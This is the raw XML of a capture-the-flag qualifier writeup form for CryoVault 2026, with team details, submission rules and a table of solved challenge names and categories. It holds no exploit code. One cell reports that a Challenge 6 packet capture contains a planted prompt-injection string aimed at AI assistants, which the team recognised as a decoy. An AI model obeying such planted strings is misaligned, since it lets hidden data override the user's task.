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0"/>
        <w:gridCol w:w="7846"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1900"/>
            <w:gridCol w:w="78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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="0" distT="0" distL="0" distR="0">
                  <wp:extent cx="1028700" cy="1009650"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr descr="CryoVault 2026 logo" id="2" name="image1.png"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr descr="CryoVault 2026 logo" id="0" name="image1.png"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId6"/>
                          <a:srcRect b="0" l="0" r="0" t="0"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1028700" cy="10096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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="111111"/>
                <w:sz w:val="52"/>
                <w:szCs w:val="52"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CryoVault 2026</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Fonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ea1d32"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Qualifier Writeup</w:t>
            </w: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color w:val="6b6b6b"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">10–11 October 2026  ·  ISFCR, PES University</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:color="ea1d32" w:space="1" w:sz="12" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:color="ea1d32" w:space="4" w:sz="8" w:val="single"/>
        </w:pBdr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Team details</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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="6b6b6b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The team name must match CTFd exactly.</w:t>
      </w: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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Team name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0A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>Ctrl-Alt-Elite</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0B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Team leader</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0C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>Anirudh Ashrith</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0D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">College or university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0E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>RV University, Bengaluru</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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Final rank</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10">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>[fill in from CTFd]</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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Final score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12">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>[fill in from CTFd]</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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Challenges solved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14">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>[fill in from CTFd]</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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Anything else we should know</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16">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>The capture for Challenge 6 contains a planted prompt-injection string aimed at AI assistants (see the Challenge 6 analysis). We identified it as a decoy and did not follow it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:color="ea1d32" w:space="4" w:sz="8" w:val="single"/>
        </w:pBdr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to submit</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Fonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">one PDF named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TeamName&gt;_writeups.pdf</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Add a challenge page for each challenge you solved.</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Show how you got each flag: the commands, requests and scripts you ran. A flag with no method is not credited.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Screenshots (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">where necessary).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List the tools you used, including AI assistants.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00" w:right="0" w:hanging="260"/>
        <w:jc w:val="left"/>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Copied writeups and shared flags disqualify every team involved.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore w:val="1"/>
        <w:pBdr>
          <w:bottom w:color="ea1d32" w:space="4" w:sz="8" w:val="single"/>
        </w:pBdr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Solve summary</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Fonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="6b6b6b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One row per solved challenge.</w:t>
      </w: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046"/>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="2800"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="700"/>
            <w:gridCol w:w="4046"/>
            <w:gridCol w:w="2200"/>
            <w:gridCol w:w="2800"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="1"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
            <w:pPr>
              <w:rPr/>
            </w:pPr>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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Challenge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22">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23">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24">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="6b6b6b"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1</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25">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Sparse-Change</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Crypto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
            <w:pPr>
              <w:rPr/>
            </w:pPr>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28">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="6b6b6b"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2</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29">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>The Third Key Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>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2C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="6b6b6b"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3</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2D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>The Deletion Echo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>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30">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="6b6b6b"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4</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31">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>The Last Committed Message</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
            <w:pPr>
              <w:rPr/>
            </w:pPr>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6b6b6b"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5</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35">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Phantom Mesh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>RF / IoT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
            <w:pPr>
              <w:rPr/>
            </w:pPr>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38">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="6b6b6b"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">6</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39">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Zaza (challenge2.pcap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Forensics (network)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Anirudh Ashrith</w:t>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3C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="6b6b6b"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">7</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3D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>FlaGuard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Mobile Reverse Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>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40">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="6b6b6b"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">8</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41">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Fluxgate G3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Embedded / Firmware Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
            <w:pPr>
              <w:rPr/>
            </w:pPr>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b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="6b6b6b"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">9</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45">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Oatmeal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Mobile Reverse Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
            <w:pPr>
              <w:rPr/>
            </w:pPr>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48">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
